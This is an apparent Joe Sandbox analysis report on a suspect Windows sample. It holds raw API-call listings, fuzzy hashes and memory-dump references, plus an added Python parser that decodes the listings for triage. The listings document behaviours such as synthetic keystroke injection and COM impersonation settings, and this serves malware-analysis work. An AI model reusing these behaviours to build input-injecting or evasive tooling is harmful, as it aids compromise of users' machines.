                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 87235514-0
                                                                                                                                                                              • Opcode ID: a3832fa6a371d208f55de72e0f92e189ee7fd5ec8e3384cbfca528f54c4780ef
                                                                                                                                                                              • Instruction ID: 335bf65e14fb7fbf89445e2a8b75edddd780bb8e4dccd0edb6f2fd17cbfbe402
                                                                                                                                                                              • Opcode Fuzzy Hash: a3832fa6a371d208f55de72e0f92e189ee7fd5ec8e3384cbfca528f54c4780ef
                                                                                                                                                                              • Instruction Fuzzy Hash: C951E3A06087D53EFB364234CC55BBA7EA96F46708F089489E1D9A58D2C3E8EDC4D760
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetParent.USER32(00000000), ref: 00E0B6E0
                                                                                                                                                                              • GetKeyboardState.USER32(?), ref: 00E0B6F5
                                                                                                                                                                              • SetKeyboardState.USER32(?), ref: 00E0B756
                                                                                                                                                                              • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00E0B782
                                                                                                                                                                              • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00E0B79F
                                                                                                                                                                              • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00E0B7DE
                                                                                                                                                                              • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00E0B7FF
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 87235514-0
                                                                                                                                                                              • Opcode ID: 3af579dbd1bd8231aaff971918ca038bb6ff03b3dbb5de6f39c9859c70cf4c39
                                                                                                                                                                              • Instruction ID: 0c3b35b87ba56226034e5c581538d403c80ed34debb612c6166cafd60085c9bc
                                                                                                                                                                              • Opcode Fuzzy Hash: 3af579dbd1bd8231aaff971918ca038bb6ff03b3dbb5de6f39c9859c70cf4c39
                                                                                                                                                                              • Instruction Fuzzy Hash: DC5105A09487D53EFB368334CC55B767EA8BB45308F0C958AE0D56A8D2D394ECD8DB60
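The two keyboard functions above are mirror images: one snapshots the keyboard state with GetKeyboardState, rewrites it with SetKeyboardState, and then posts WM_KEYUP (0x101) for VK_SHIFT (0x10), VK_CONTROL (0x11), VK_MENU (0x12) and VK_LWIN (0x5B); the other does the same with WM_KEYDOWN (0x100). The menu function walks a window's menu with GetMenuStringW using MF_BYPOSITION (0x400) and then posts WM_COMMAND (0x111), and the COM function calls CoCreateInstanceEx with dwClsCtx 0x15 (CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_REMOTE_SERVER) after CoInitializeSecurity with RPC_C_AUTHN_LEVEL_CONNECT (2) and RPC_C_IMP_LEVEL_IMPERSONATE (3). Those constant values are documented Windows SDK values; that these routines are the AutoIt runtime's synthetic-input, menu-selection and ObjCreate helpers is an assumption drawn from the AUTOIT.ERROR string, not something the report states. The following Python is an added example for this page, not Joe Sandbox code and not code recovered from the sample: it parses these "APIs" listing lines (copied from the report as sample input) into records, names the constants, and flags the keyboard-state plus modifier-key-message pattern so it can be spotted across many function blocks instead of by eye.

```python
"""Decode Joe Sandbox 'APIs' listing lines and name the Win32 constants in them.
Added example for this report page; not Joe Sandbox code, not sample code.
The listing strings are copied from the report; the constant tables cover
only the values those lines use (documented Windows SDK values)."""
import re
from dataclasses import dataclass
from typing import List, Optional, Set, Tuple

# "• Api.MODULE(arg,...), ref: ADDR" or "• Api.MODULE ref: ADDR",
# optionally prefixed with "Part of subcall function ADDR:".
LINE_RE = re.compile(
    r"(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})"
)
WINDOW_MESSAGES = {0x100: "WM_KEYDOWN", 0x101: "WM_KEYUP", 0x111: "WM_COMMAND"}
VIRTUAL_KEYS = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN"}
CLSCTX = {0x1: "CLSCTX_INPROC_SERVER", 0x4: "CLSCTX_LOCAL_SERVER", 0x10: "CLSCTX_REMOTE_SERVER"}
AUTHN_LEVEL = {2: "RPC_C_AUTHN_LEVEL_CONNECT"}
IMP_LEVEL = {3: "RPC_C_IMP_LEVEL_IMPERSONATE"}
MF_BYPOSITION = 0x400

# Sample input: listing lines copied from the report's function blocks.
KEYUP_LISTING = """\
• GetParent.USER32(?), ref: 00E0B8C0
• GetKeyboardState.USER32(?), ref: 00E0B8D5
• SetKeyboardState.USER32(?), ref: 00E0B936
• PostMessageW.USER32(?,00000101,00000010,?), ref: 00E0B964
• PostMessageW.USER32(?,00000101,00000011,?), ref: 00E0B983
• PostMessageW.USER32(?,00000101,00000012,?), ref: 00E0B9C4
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 00E0B9E7
"""
MENU_LISTING = """\
• GetMenu.USER32(?), ref: 00E32C1F
• GetMenuItemCount.USER32(00000000), ref: 00E32C51
• GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00E32C79
• _wcslen.LIBCMT ref: 00E32CAF
• GetMenuItemID.USER32(?,?), ref: 00E32CE9
• GetSubMenu.USER32(?,?), ref: 00E32CF7
  • Part of subcall function 00E04393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E043AD
  • Part of subcall function 00E04393: GetCurrentThreadId.KERNEL32 ref: 00E043B4
  • Part of subcall function 00E04393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00E02F00), ref: 00E043BB
• PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00E32D7F
"""
COM_LISTING = """\
• CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00E256AE
• CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00E2582C
"""

@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Optional[int]]  # None where the sandbox printed '?'
    ref: str
    subcall: Optional[str]     # callee address when marked 'Part of subcall'

def parse_line(line: str) -> Optional[ApiCall]:
    m = LINE_RE.search(line)
    if not m:
        return None
    raw = m.group("args")
    args = [None if t.strip() == "?" else int(t, 16) for t in raw.split(",")] if raw else []
    return ApiCall(m.group("api"), m.group("module"), args, m.group("ref"), m.group("sub"))

def parse_listing(text: str) -> List[ApiCall]:
    return [c for c in map(parse_line, text.splitlines()) if c]

def describe(call: ApiCall) -> str:
    """Name the argument constants that matter for triage, or '' if none."""
    a = call.args
    if call.api == "PostMessageW" and len(a) >= 3 and a[1] is not None:
        msg = WINDOW_MESSAGES.get(a[1], "0x%X" % a[1])
        if a[1] in (0x100, 0x101) and a[2] is not None:
            return "%s %s" % (msg, VIRTUAL_KEYS.get(a[2], "0x%X" % a[2]))
        return msg
    if call.api == "CoCreateInstanceEx" and len(a) >= 3 and a[2] is not None:
        names = [n for bit, n in CLSCTX.items() if a[2] & bit]  # dwClsCtx flags
        rest = a[2] & ~sum(CLSCTX)
        return "|".join(names + (["0x%X" % rest] if rest else []))
    if call.api == "CoInitializeSecurity" and len(a) >= 6:  # dwAuthnLevel, dwImpLevel
        return "%s %s" % (AUTHN_LEVEL.get(a[4], a[4]), IMP_LEVEL.get(a[5], a[5]))
    if call.api == "GetMenuStringW" and len(a) >= 5 and a[4] == MF_BYPOSITION:
        return "MF_BYPOSITION"
    return ""

def synthetic_modifier_keys(calls: List[ApiCall]) -> Set[Tuple[str, str]]:
    """(message, key) pairs when a function snapshots and rewrites the keyboard
    state and posts modifier-key messages itself rather than using real input."""
    if not {"GetKeyboardState", "SetKeyboardState", "PostMessageW"} <= {c.api for c in calls}:
        return set()
    return {(WINDOW_MESSAGES[c.args[1]], VIRTUAL_KEYS[c.args[2]]) for c in calls
            if c.api == "PostMessageW" and len(c.args) >= 3
            and c.args[1] in WINDOW_MESSAGES and c.args[2] in VIRTUAL_KEYS}

if __name__ == "__main__":
    for title, text in (("key-up", KEYUP_LISTING), ("menu", MENU_LISTING), ("COM", COM_LISTING)):
        calls = parse_listing(text)
        print(title, "modifier keys:", sorted(synthetic_modifier_keys(calls)))
        for c in calls:
            print("  %s.%s -> %s" % (c.api, c.module, describe(c) or "-"))
```

Run against the WM_KEYDOWN block above it reports the same four modifiers with WM_KEYDOWN; against the menu block it reports nothing, because the keyboard-state reads and writes are absent there even though PostMessageW is present. Feeding the whole report's listings through `parse_listing` gives a quick way to count how many functions carry the synthetic-input pattern versus ordinary message posting.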
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00DD5F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 00DD57E3
                                                                                                                                                                              • __fassign.LIBCMT ref: 00DD585E
                                                                                                                                                                              • __fassign.LIBCMT ref: 00DD5879
                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 00DD589F
                                                                                                                                                                              • WriteFile.KERNEL32(?,FF8BC35D,00000000,00DD5F16,00000000,?,?,?,?,?,?,?,?,?,00DD5F16,?), ref: 00DD58BE
                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000001,00DD5F16,00000000,?,?,?,?,?,?,?,?,?,00DD5F16,?), ref: 00DD58F7
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1324828854-0
                                                                                                                                                                              • Opcode ID: eeb9c4ed70efe54b041f2f6bd8f8379de7bc5e7027a2d6dba9c4c1626522e07c
                                                                                                                                                                              • Instruction ID: d45e86e39b1ff7db7f595520a728221e55fd8b130431475616be81f98557ce6d
                                                                                                                                                                              • Opcode Fuzzy Hash: eeb9c4ed70efe54b041f2f6bd8f8379de7bc5e7027a2d6dba9c4c1626522e07c
                                                                                                                                                                              • Instruction Fuzzy Hash: 8D51AD70A046499FDB10CFA8E895AEEBBF8EF08310F14415BE956E7391D7309A45CF61
APIs
• _ValidateLocalCookies.LIBCMT ref: 00DC30BB
• ___except_validate_context_record.LIBVCRUNTIME ref: 00DC30C3
• _ValidateLocalCookies.LIBCMT ref: 00DC3151
• __IsNonwritableInCurrentImage.LIBCMT ref: 00DC317C
• _ValidateLocalCookies.LIBCMT ref: 00DC31D1
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: csm
• API String ID: 1170836740-1018135373
APIs
  • Part of subcall function 00E0E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00E0D7CD,?), ref: 00E0E714
  • Part of subcall function 00E0E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00E0D7CD,?), ref: 00E0E72D
• lstrcmpiW.KERNEL32(?,?), ref: 00E0D7F0
• MoveFileW.KERNEL32(?,?), ref: 00E0D82A
• _wcslen.LIBCMT ref: 00E0D8B0
• _wcslen.LIBCMT ref: 00E0D8C6
• SHFileOperationW.SHELL32(?), ref: 00E0D90C
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
• String ID: \*.*
• API String ID: 3164238972-1173974218
APIs
• GetInputState.USER32 ref: 00E14310
• TranslateAcceleratorW.USER32(?,00000000,?), ref: 00E14367
• TranslateMessage.USER32(?), ref: 00E14390
• DispatchMessageW.USER32(?), ref: 00E1439A
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E143AB
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: Message$Translate$AcceleratorDispatchInputPeekState
• String ID: (
• API String ID: 2256411358-2063206799
APIs
• SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00E338B8
• GetWindowLongW.USER32(?,000000F0), ref: 00E338EB
• GetWindowLongW.USER32(?,000000F0), ref: 00E33920
• SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00E33952
• SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00E3397C
• GetWindowLongW.USER32(?,000000F0), ref: 00E3398D
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 00E339A7
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: LongWindow$MessageSend
• String ID:
• API String ID: 2178440468-0
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E080D0
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E080F6
• SysAllocString.OLEAUT32(00000000), ref: 00E080F9
• SysAllocString.OLEAUT32(?), ref: 00E08117
• SysFreeString.OLEAUT32(?), ref: 00E08120
• StringFromGUID2.OLE32(?,?,00000028), ref: 00E08145
• SysAllocString.OLEAUT32(?), ref: 00E08153
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: String$Alloc$ByteCharMultiWide$FreeFrom
• String ID:
• API String ID: 3761583154-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E081A9
                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E081CF
                                                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 00E081D2
                                                                                                                                                                              • SysAllocString.OLEAUT32 ref: 00E081F3
                                                                                                                                                                              • SysFreeString.OLEAUT32 ref: 00E081FC
                                                                                                                                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 00E08216
                                                                                                                                                                              • SysAllocString.OLEAUT32(?), ref: 00E08224
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: String$Alloc$ByteCharMultiWide$FreeFrom
• String ID:
• API String ID: 3761583154-0
APIs
• GetStdHandle.KERNEL32(0000000C), ref: 00E10E99
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00E10ED5
Strings
Similarity
• API ID: CreateHandlePipe
• String ID: nul
• API String ID: 1424370930-2873401336
APIs
• GetStdHandle.KERNEL32(000000F6), ref: 00E10F6D
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00E10FA8
Strings
Similarity
• API ID: CreateHandlePipe
• String ID: nul
• API String ID: 1424370930-2873401336
APIs
  • Part of subcall function 00DA7873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00DA78B1
  • Part of subcall function 00DA7873: GetStockObject.GDI32(00000011), ref: 00DA78C5
  • Part of subcall function 00DA7873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00DA78CF
• SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00E34BB0
• SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00E34BBD
• SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00E34BC8
• SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00E34BD7
• SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00E34BE3
Strings
Similarity
• API ID: MessageSend$CreateObjectStockWindow
• String ID: Msctls_Progress32
• API String ID: 1025951953-3636473452
APIs
  • Part of subcall function 00DDDB23: _free.LIBCMT ref: 00DDDB4C
• _free.LIBCMT ref: 00DDDBAD
  • Part of subcall function 00DD2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00DDDB51,00E71DC4,00000000,00E71DC4,00000000,?,00DDDB78,00E71DC4,00000007,00E71DC4,?,00DDDF75,00E71DC4), ref: 00DD2D4E
  • Part of subcall function 00DD2D38: GetLastError.KERNEL32(00E71DC4,?,00DDDB51,00E71DC4,00000000,00E71DC4,00000000,?,00DDDB78,00E71DC4,00000007,00E71DC4,?,00DDDF75,00E71DC4,00E71DC4), ref: 00DD2D60
• _free.LIBCMT ref: 00DDDBB8
• _free.LIBCMT ref: 00DDDBC3
• _free.LIBCMT ref: 00DDDC17
• _free.LIBCMT ref: 00DDDC22
• _free.LIBCMT ref: 00DDDC2D
• _free.LIBCMT ref: 00DDDC38
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
APIs
Strings
Similarity
• API ID: _memcmp
• String ID: j`
• API String ID: 2931989736-1521845545
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00E0E328
• LoadStringW.USER32(00000000), ref: 00E0E32F
• GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00E0E345
• LoadStringW.USER32(00000000), ref: 00E0E34C
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 00E0E390
Strings
• %s (%d) : ==> %s: %s %s, xrefs: 00E0E36D
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: HandleLoadModuleString$Message
                                                                                                                                                                              • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                                              • API String ID: 4072794657-3128320259
                                                                                                                                                                              • Opcode ID: c844bd84a843cde217d64603b20c884e94b09b67dc52685e0615d5317c3b294c
                                                                                                                                                                              • Instruction ID: 9d55ca66bc4fe0a31c05362b3c5e7e46e317307f17d5f7134b35e3ba90fb8769
                                                                                                                                                                              • Opcode Fuzzy Hash: c844bd84a843cde217d64603b20c884e94b09b67dc52685e0615d5317c3b294c
                                                                                                                                                                              • Instruction Fuzzy Hash: 890186F290430CBFE71197A4AD8EEE77B6CDB08300F0055A1B755F6041EA749E888B71
                                                                                                                                                                              APIs
                                                                                                                                                                              • InterlockedExchange.KERNEL32(?,?), ref: 00E11322
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(00000000,?), ref: 00E11334
                                                                                                                                                                              • TerminateThread.KERNEL32(00000000,000001F6), ref: 00E11342
                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00E11350
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00E1135F
                                                                                                                                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 00E1136F
                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(00000000), ref: 00E11376
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3495660284-0
                                                                                                                                                                              • Opcode ID: 2b648a568c4cbc637ea15b941526e3cc02657eefc95f5f68c251756b2f2a1054
                                                                                                                                                                              • Instruction ID: 336dca8ae393e1f5efd2423e6342a6743ba30f429c063bc1cb2b099772c081f7
                                                                                                                                                                              • Opcode Fuzzy Hash: 2b648a568c4cbc637ea15b941526e3cc02657eefc95f5f68c251756b2f2a1054
                                                                                                                                                                              • Instruction Fuzzy Hash: 31F0C932046616AFD7411B55EE8DBDABF39FF04306F412121F201A18B4877495B9CF90
                                                                                                                                                                              APIs
                                                                                                                                                                              • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00E2281D
                                                                                                                                                                              • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00E2283E
                                                                                                                                                                              • WSAGetLastError.WSOCK32 ref: 00E2284F
                                                                                                                                                                              • htons.WSOCK32(?,?,?,?,?), ref: 00E22938
                                                                                                                                                                              • inet_ntoa.WSOCK32(?), ref: 00E228E9
                                                                                                                                                                                • Part of subcall function 00E0433E: _strlen.LIBCMT ref: 00E04348
                                                                                                                                                                                • Part of subcall function 00E23C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00E1F669), ref: 00E23C9D
                                                                                                                                                                              • _strlen.LIBCMT ref: 00E22992
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3203458085-0
                                                                                                                                                                              • Opcode ID: c0dbdf3945c9cf1395d5e77f2d0df2b2a466d68cfd689ceea049eb8d106663c1
                                                                                                                                                                              • Instruction ID: 9f2acb5f993229cc1f8051e84f801fce0f8010950e4668a5ff855881398a78ae
